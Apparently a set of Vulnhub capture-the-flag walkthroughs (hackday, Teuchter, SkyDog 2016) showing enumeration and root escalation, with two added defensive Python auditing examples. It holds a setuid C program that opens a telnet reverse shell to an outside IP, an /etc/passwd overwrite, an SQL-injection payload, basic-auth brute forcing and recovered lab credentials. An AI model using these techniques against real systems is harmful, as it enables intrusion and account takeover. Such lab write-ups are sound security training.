sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

EOF

I pulled it over to the host and gave the script executable permissions:

wget http://192.168.253.134/passwd.sh
--2016-11-21 16:06:57--  http://192.168.253.134/passwd.sh
Connecting to 192.168.253.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1734 (1.7K) [text/x-sh]
Saving to: 'passwd.sh'

passwd.sh           100%[===================>]   1.69K  --.-KB/s    in 0s      

2016-11-21 16:06:57 (385 MB/s) - 'passwd.sh' saved [1734/1734]


www-data@hackday:/tmp$ chmod +x passwd.sh
chmod +x passwd.sh

I ran the script to overwrite the contents of /etc/passwd with the modified version I created offline:

www-data@hackday:/tmp$ ./passwd.sh > /etc/passwd
./passwd.sh > /etc/passwd

Verifying the new file was created properly:

www-data@hackday:/tmp$ cat /etc/passwd
cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash
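A defender’s counterpart to the tampering just shown, added here as an example and not part of the original write-up: it flags /etc/passwd entries whose password field carries a hash instead of ‘x’, empty password fields, extra UID 0 accounts, and a writable file mode. SAMPLE_PASSWD is constructed from the abbreviated listing above; audit_passwd_file() is a hypothetical wrapper for running the same checks on a live system.

```python
import os
import stat

# Constructed sample modelled on the abbreviated tampered /etc/passwd above;
# it is not a real system file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash
"""


def audit_passwd_entries(text):
    """Return (username, reason) findings for /etc/passwd content.

    On a shadow-enabled system every second field should be exactly 'x'.
    A hash placed there is used for authentication instead of /etc/shadow,
    which is exactly how taviso's password was set above. Empty password
    fields and UID 0 accounts other than root are flagged as well."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw.startswith("$"):
            findings.append((name, "password hash stored in /etc/passwd"))
        elif pw != "x":
            findings.append((name, "password field is not shadowed"))
        if uid == "0" and name != "root":
            findings.append((name, "additional UID 0 account"))
    return findings


def audit_passwd_mode(mode):
    """Check a stat() st_mode value. /etc/passwd should be 0644 and owned by
    root; any group or world write bit lets a low-privileged user (www-data
    in the write-up) rewrite it. Returns a list of problems, empty if clean."""
    problems = []
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    return problems


def audit_passwd_file(path="/etc/passwd"):
    """Hypothetical wrapper: run both checks against a live file, plus an
    owner check."""
    st = os.stat(path)
    problems = audit_passwd_mode(st.st_mode)
    if st.st_uid != 0:
        problems.append(f"owned by uid {st.st_uid}, not root")
    with open(path, encoding="utf-8", errors="replace") as fh:
        entries = audit_passwd_entries(fh.read())
    return {"file": problems, "entries": entries}


if __name__ == "__main__":
    for name, reason in audit_passwd_entries(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
    # 0o100666 is the mode a world-writable regular file reports via stat().
    print(audit_passwd_mode(0o100666))
```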

Now I should be able to su to the user ‘taviso’ and from there elevate to root.

www-data@hackday:/tmp$ su taviso
su taviso
Password: pass123

taviso@hackday:/tmp$

Cool, that worked. Now we verify our sudo permissions for laughs. The user can perform any actions as root. Score!

taviso@hackday:/tmp$ sudo -l
[sudo] password for taviso: 
Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:
    (ALL : ALL) ALL

Now we just su to root and grab our prize:

taviso@hackday:/tmp$ sudo su
sudo su
[sudo] password for taviso: pass123


root@hackday:/tmp#

And the flag:

root@hackday:~# cat flag.txt
cat flag.txt
Urime, 
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5

Google translate told me the flag text translates to “Congratulations, now the report begins.”

The md5 was a hash of “rio”.

Now for the heck of it I could SSH in directly as the ‘taviso’ user and have a further look around.

root@mrb3n:~# ssh taviso@192.168.253.138
taviso@192.168.253.138's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

6 packages can be updated.
2 updates are security updates.


Last login: Sat Oct 29 23:07:00 2016
taviso@hackday:~$ sudo su
[sudo] password for taviso: 
root@hackday:/home/taviso

Here is the function in config.php responsible for the authentication bypass. Sanitize your input!

function check_login($username,$password){
	// Keyword blacklist: str_ireplace() deletes each word case-insensitively.
	// Only the password has its single quote stripped; the username keeps it.
	$username = str_ireplace("OR", "", $username);
	$username = str_ireplace("UNION", "", $username);
	$username = str_ireplace("AND", "", $username);
	$password = str_ireplace("'","",$password);
	// Both values are concatenated straight into the statement.
	$sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
	$result = mysqli_fetch_assoc(execute_query($sql_query));
	$result = $result["ID"];
	if($result >= 1){
		return $result;
	}else{
		return -1;
	}
}
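The bypass described above, worked through in Python as an added example (not code from the write-up or from the vulnerable application): filter_like_check_login() reproduces the str_ireplace() blacklist, effective_sql() approximates MySQL’s # comment handling so the statement the database really sees can be inspected, and login_safe() is the parameterised alternative. The klienti rows are constructed sample data and SQLite stands in for MySQL.

```python
import re
import sqlite3

# Keywords deleted from the username by the PHP check_login() shown above.
BLACKLIST = ("OR", "UNION", "AND")


def filter_like_check_login(username, password):
    """Reproduce the PHP filter: str_ireplace() is a case-insensitive,
    single-pass deletion of each keyword from the username, while only the
    single quote is stripped from the password. The quote, the character that
    actually breaks out of the literal, survives in the username, and
    legitimate names containing AND/OR (e.g. 'sandra') are mangled."""
    for word in BLACKLIST:
        username = re.sub(re.escape(word), "", username, flags=re.IGNORECASE)
    password = password.replace("'", "")
    return username, password


def build_query_vulnerable(username, password):
    """String-concatenate the filtered values exactly as config.php does."""
    u, p = filter_like_check_login(username, password)
    return f"SELECT ID FROM klienti where `username` = '{u}' and `password` = '{p}';"


def effective_sql(query):
    """Approximate MySQL's comment handling: an unquoted '#' comments out the
    rest of the line. Single-quoted literals are tracked so a '#' inside a
    literal is kept (simplified: backslash escapes are not handled)."""
    in_literal = False
    for i, ch in enumerate(query):
        if ch == "'":
            in_literal = not in_literal
        elif ch == "#" and not in_literal:
            return query[:i].rstrip()
    return query


def make_db():
    """Constructed sample table standing in for bank_database.klienti."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE klienti (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO klienti (ID, username, password) VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Execute what the database actually sees after the '#' comment. The
    password clause is gone entirely, so the result depends only on whatever
    is left of the WHERE clause. Returns the ID or -1 like the PHP original."""
    stmt = effective_sql(build_query_vulnerable(username, password))
    row = conn.execute(stmt).fetchone()
    return row[0] if row else -1


def login_safe(conn, username, password):
    """The fix: a parameterised query. The input is bound as data and compared
    literally against the column; it is never parsed as SQL, so no blacklist
    is needed and names like 'sandra' work."""
    row = conn.execute(
        "SELECT ID FROM klienti WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else -1


if __name__ == "__main__":
    db = make_db()
    payload = "' #;-- -"  # the string from the write-up, URL-decoded
    print(build_query_vulnerable(payload, "test"))
    print("executed as:", effective_sql(build_query_vulnerable(payload, "test")))
    print("vulnerable, alice' # / wrong ->", login_vulnerable(db, "alice' #", "wrong"))
    print("safe,       alice' # / wrong ->", login_safe(db, "alice' #", "wrong"))
```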

And the MySQL credentials in cleartext in the config.php file:

function execute_query($sql){
	$db_host = "127.0.0.1";
	$db_name = "bank_database";
	$db_user = "root";
	$db_password = "NuCiGoGo321";

Enjoyable VM with a privilege escalation method I hadn’t seen on Vulnhub yet. Thanks to r_73en for putting it together and sharing, as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Teuchter vulnhub walkthrough

When knightmare asked me to test his latest boot2root based around Scottish culture/slang I jumped at the opportunity. Having chatted quite a bit and debugged issues on other VMs, I had already picked up several colorful Scottish expressions, but boy was I in for a ride!

Gaun yersel!!!


You can grab the VM here: https://www.vulnhub.com/entry/teuchter-03,163/

As always I imported the VM and fired off an nmap scan. This one only gave me port 80 to work with.

Hitting the web server I was greeted by Willie from the Simpsons telling me to stay out of his server, we’ll see about that.

I checked the page source and noted down several hints including possible usernames and directories.

Images will open doors. Perhaps some stego or exif madness? I grabbed all the images down locally to have a look.

Amazing shot!

Well, the ‘flicks’ directory was forbidden:

…and the ‘telly’ directory gave me more clues (and confusion):

More hints. At this point my head was spinning!


Focusing on the phpinfo hint I tried browsing to /flicks/phpinfo.php but that would be too easy. Firing off Burp intruder with a list of known file extensions finally got me a hit for phpinfo.pht. Nice troll.

The clue about images opening doors made me think I was looking for some sort of backdoor. I re-scanned to see if any additional ports had opened.  Googling for “php backdoors” gave me this link as the first hit: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html.

Sure enough I was able to use this technique to gain command execution:

I uploaded a PHP reverse shell but could not get it working (I’d come to find out why later on).

Turning to this great reverse shell cheat sheet I decided to use the trusty mknod technique to fire myself a reverse shell.

Ok, now we’re in as www-data:

I was stuck here for quite some time. After much enumeration I took a look for SUID files and came up with a txt file in the /home/proclaimers directory, which was strange.

The file talked about wildcards. Possible privilege escalation?

Some more enumeration turned up a hint in the login.txt file, alluding to a password hidden within an image file. I had already checked out every image though!

Well, in this case knightmare was being literal and the password was right in front of me, in the form of the filename.

Once I switched over to the jkerr user I looked around quite a bit but did not find anything useful. Taking a look at the list of users I decided to Google for who cpgrogan could be.

Based on this Wikipedia article Clare Grogan was best known as the lead singer of the band ‘Altered Images’. After bouncing my head off the keyboard for some time, once again I had another password.

Once switched over to the cpgrogan user I was able to browse around the home directory and found yet another reference to wildcards.

At this point I needed to gain access as one more user, ‘proclaimers’. There were a few images left and the comment ‘images open doors’ was still burned in my mind so I pulled them down via Python 3 http.server (which btw I had to use because Knightmare removed the Python2 binary… thanks for that one 🙂 )

The ‘promisedyouamiracle’ image appeared to have an interesting base64 encoded string in the exif data.

The string decoded to ‘gemini’. C’mon password!

It worked! OK! Now I was in as theproclaimers; what was the next step?

Looking around forever I landed on an interesting shell script ‘numpties.sh’. The script showed why I had trouble with my PHP reverse shell as well as why I couldn’t use wget to upload anything haha. It showed that any file named ‘semaphore’ placed in the /home/proclaimers/letterfromamerica directory would have its ownership changed to root and the SUID bit set. Smells like privilege escalation. I also assumed that the shell script must be running on a cron job.

At this point I needed a simple binary that, once compiled and with its ownership/permissions changed by this cron job, could be leveraged to fire me a root shell.

This simple program did the job:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
  setuid( 0 );
  system( "mknod backpipe p; telnet 192.168.110.175 443 0<backpipe | /bin/bash 1>backpipe" );
  return 0;
}

I compiled it locally and downloaded it using Curl thanks to knightmare’s trolling.

I started up a netcat listener and waited. Not too long after I had a hit and had a root shell! Well, we all know by now that knightmare’s VMs are not over with root and this one was no exception! Onwards to the final flag…and on and on and on. More trolling, I was sweating by this time.

Eventually I got to the bottom of the rabbit hole and found a zip file with what I could only imagine would be a disk image inside.

Of course the zip was password protected and nothing worked. I went back and made a word list from everything I had seen so far. Nada! Eventually out of sheer desperation I tried ‘Teuchter’ and immediately wanted to strangle knightmare through the screen.

The zip contained a virtual disk image. I tried to mount it, cut it up with strings and binwalk but nothing worked. Exploring a bit more with my shiny new root privileges gave me another hint within the crontabs file:

## So vmfs-tools package eh....?
*/5 * * * * /bin/sh /usr/local/bin/numpties.sh > /dev/null 2>&1

Some Googling showed me I could mount the disk image as a new drive and use the vmfs-tools package to explore it. I added the image as a new drive under sda2:

root@mrb3n:~/Desktop/teuch# fdisk -l

Disk /dev/sda: 30 GiB, 32212254720 bytes, 62914560 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xb2d1b90f

Device     Boot    Start      End  Sectors  Size Id Type
/dev/sda1  *        2048 60262399 60260352 28.8G 83 Linux
/dev/sda2       60264446 62912511  2648066  1.3G  5 Extended
/dev/sda5       60264448 62912511  2648064  1.3G 82 Linux swap / Solaris

I then used vmfs-fuse to mount the drive and explore it:

root@mrb3n:~/Desktop/teuch# vmfs-fuse /dev/sdb1 /mnt/teuch

root@mrb3n:~/Desktop/teuch# cd /mnt/teuch/

Red Kola? Irn Bru? More hints!

Almost there.. Check the ISO and remember password relates to the TV Advert you watched.

I took out the spaces but it’s 25 characters but the Wikipedia page will get it for you.

This was either another troll or knightmare was showing some mercy. From all the hints I was guessing the final flag was hidden inside the glass_ch.jpg image. I could probably pull it out with steghide but I still needed a 25 character password. After going back to the beginning and reviewing everything I had once again I came up with ‘madeinscotlandfromgirders’ as the password.

I copied the image file over to a Windows VM where I had steghide from a previous CTF and FINALLY had the “real” flag after so many “almosts”.

This was an awesome VM, a mixture of entertaining and extremely frustrating. I learned a bunch about Scottish culture and could finally decode some of the things knightmare was saying.

Thanks to knightmare for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

This glossary of Scottish slang and Jargon also came in handy: https://en.wiktionary.org/wiki/Appendix:Glossary_of_Scottish_slang_and_jargon#G

SkyDog 2016: Catch Me If You Can Vulnhub Walkthrough

A new VM was released on Vulnhub this week. I had some downtime at night while traveling for work so I grabbed the image and got to work.

https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/

The challenge is set up with 8 flags as follows:

Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”
Flag#2 – “Obscurity or Security? That is the Question”
Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”
Flag#4 – “A Good Agent is Hard to Find”
Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”
Flag#6 – “Where in the World is Frank?”
Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”
Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”

I always enjoy challenges like this with multiple flags as it helps to keep you going/on path.

I started off with an nmap scan to see what we were dealing with:

root@kali:~# nmap -A -p- -Pn --open -T4 172.16.94.136

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-11 09:08 EST
Nmap scan report for 172.16.94.136
Host is up (0.00039s latency).
Not shown: 65531 filtered ports, 1 closed port
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
443/tcp   open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after:  2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
|_  256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
MAC Address: 00:0C:29:14:57:58 (VMware)
Device type: general purpose|phone|WAP|specialized|storage-misc

A web server listening on port 80 and 443 as well as an SSH service on a non-standard port.

I went a bit out of order with the flags so the clues do not match up exactly. I checked out the SSH service first and the banner gave up a flag.

root@kali:~# ssh 172.16.94.136 -p 22222
The authenticity of host '[172.16.94.136]:22222 ([172.16.94.136]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[172.16.94.136]:22222' (ECDSA) to the list of known hosts.
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
root@172.16.94.136's password:

The flag was the MD5 of the word ‘encrypt’.

I spun my wheels for a while on the next flag. After running Burp and Dirbuster for a while and not coming up with anything new, I decided to go file by file. One of the JavaScript files had an interesting comment, in Hex, which was one of the clues.

root@kali:~# curl -s http://172.16.94.136/oldIE/html5.js
/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */
/*! HTML5 Shiv v3.6 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed */
/* Source: https://github.com/aFarkas/html5shiv — No longer maintained */
.......................snip......................

Decoding the Hex with Python gave me the next flag, which was the MD5 of ‘nmap’ which must be the hint for the SSH banner flag.

root@kali:~# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b37633031333230373061306566373164353432363633653964633166356465657d".decode('hex')
'flag{7c0132070a0ef71d542663e9dc1f5dee}'
>>>

Dirbuster turned up a protected page. Browsing to it gave me an error message. My first thought was changing my user-agent. I first attempted with Burp Intruder and a large user-agent list but did not get any hits.

root@kali:~# curl -s http://172.16.94.136/personnel
ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....

Digging around for quite some time led me back to the same JavaScript file with some more interesting comments. The FBI page was expecting my UA to be IE 4.0. Super secure!

Changing my UA to IE 4.0 in Burp Repeater got me access to the FBI Portal page.

I set up a match/replace rule in Burp to make it easier to browse the site directly.


The FBI Portal page was all static content, but I did get the next flag (which cracked to ‘evidence’) as well as a clue “new+flag”.

Following the hint brought me to a password protected page.

Basic-auth can be brute-forced with Burp Intruder but I first needed a username. The JavaScript file from earlier gave us a user name and the login prompt states “FBI Personnel” so I followed the username format and configured Intruder to attempt a brute-force with the user ‘carl.hanratty’.

I set up Burp like so:

The username in position 1 with a ‘:’ separator and base64 encoding to properly format the payloads for basic-auth.

I used a large wordlist and eventually got a hit; the 301 redirect indicated a successful login.

I checked the string for the valid password.

root@kali:/# echo Y2FybC5oYW5yYXR0eTpHcmFjZQ== | base64 -d
carl.hanratty:Grace

I was greeted with an FBI evidence page which gave me my next flag (which cracked to ‘panam’).

As well as a PDF document that did not yield anything upon inspection.


As with all CTFs, I have gotten in the habit of checking images for hidden data with strings, exiftool, steghide, binwalk, etc. Running binwalk against this image file indicated the presence of something embedded. I attempted to carve it up for a while and didn’t get anywhere.

root@kali:~/Desktop/skyconCTF# binwalk -e image.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
2214320       0x21C9B0        MySQL MISAM compressed data file Version 10

I took a stab with steghide but did not have the passphrase. I eventually had a facepalm moment when trying ‘panam’. I extracted the flag.txt file and had the next flag as well as what appeared to be 2 passwords. But for what? It had to be the SSH service, as the rest of the web application appeared static, but I did not have a user name.

root@kali:~/Desktop/skyconCTF# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@kali:~/Desktop/skyconCTF# cat flag.txt 
flag{d1e5146b171928731385eb7ea38c37b8}
=ILoveFrance

clue=iheartbrenda

Google showed that the ‘fastest man alive’ clue was potentially talking about the Flash, also known as Barry Allen. Google further turned up that Barry Allen was an alias used by Frank Abagnale in the movie to trick the FBI agent tracking him. I put together a list of potential usernames based on all the aliases I could find from the movie and tried various formats.

frank.conners
frank.abagnale
barry.allen
frankconners
frankabagnale
fconners
ballen
frankconners
frankabagnale
barryallen

Trying each of these usernames combined with ‘ILoveFrance’ and ‘iheartbrenda’ eventually got me a successful login: barryallen:iheartbrenda. Logging in got me the next flag.

root@kali:~/Desktop/skyconCTF# ssh barryallen@172.16.94.136 -p 22222
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.

/usr/bin/xauth:  file /home/barryallen/.Xauthority does not exist
barryallen@skydogconctf2016:~$ 


barryallen@skydogconctf2016:~$ ls
flag.txt  security-system.data
barryallen@skydogconctf2016:~$ cat flag.txt 
flag{bd2f6a1d5242c962a05619c56fa47ba6}

This MD5 cracked to ‘theflash’.

There was also a large zip file in the user’s home directory which I transferred off using SCP to work on locally.

barryallen@skydogconctf2016:~$ file security-system.data 
security-system.data: Zip archive data, at least v2.0 to extract


root@kali:~/Desktop/skyconCTF# scp -P 22222 barryallen@172.16.94.136:/home/barryallen/security-system.data /root/Desktop/skyconCTF
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
security-system.data                          100%   71MB  80.0MB/s   00:00

I unzipped the file and ran it through binwalk (which ended up crashing my VM due to the size), whoops.

root@kali:~/Desktop/skyconCTF# unzip security-system.data.zip 
Archive:  security-system.data.zip
  inflating: security-system.data 

root@kali:~/Desktop/skyconCTF# binwalk -e security-system.data

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
150720        0x24CC0         Microsoft executable, portable (PE)
656418        0xA0422         Copyright string: "Copyright 1985-1998,Phoenix Technologies Ltd.All rights reserved."
819330        0xC8082         Copyright string: "Copyright (C) 2003-2014  VMware, Inc."
819369        0xC80A9         Copyright string: "Copyright (C) 1997-2000  Intel Corporation"
985388        0xF092C         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
996673        0xF3541         Copyright string: "Copyright 2000-2015 VMware, Inc."
1000211       0xF4313         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
5074944       0x4D7000        Microsoft executable, portable (PE)
5894224       0x59F050        Copyright string: "Copyright (C) Rational Systems, Inc."
6758664       0x672108        CRC32 polynomial table, little endian
7143424       0x6D0000        Microsoft executable, portable (PE)
17394939      0x1096CFB       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
19261011      0x125E653       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
.......................snip......................

The file appeared to be a memory dump. I haven’t done much forensics so I turned to Google and came up with Volatility on Kali which seems to be a go-to for analyzing memory dumps.

I got started with this guide: http://resources.infosecinstitute.com/memory-forensics-and-analysis-using-volatility/

I first had to check the image info to figure out the operating system the dump came from and set up a profile moving forward.

root@kali:~/Desktop/skyconCTF# volatility imageinfo -f security-system.data 
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/root/Desktop/skyconCTF/security-system.data)
                      PAE type : PAE
                           DTB : 0x33e000L
                          KDBG : 0x80545b60L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-10-10 22:00:50 UTC+0000
     Image local date and time : 2016-10-10 18:00:50 -0400

I next used the ‘filescan’ plugin and dumped out all the file names.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data filescan > files
Volatility Foundation Volatility Framework 2.5
root@kali:~/Desktop/skyconCTF# cat files | grep flag.txt 
root@kali:~/Desktop/skyconCTF# cat files | grep flag
root@kali:~/Desktop/skyconCTF# cat files | grep .txt
0x0000000005e612f8      1      0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
0x0000000

I grepped for ‘flag.txt’, ‘flag’ and just ‘.txt’ until I got several hits. Code.txt looked particularly promising. Looking at the plugin list I noticed one for checking command line history. Running it got me another Hex string.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data cmdscan
Volatility Foundation Volatility Framework 2.5
**************************************************
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
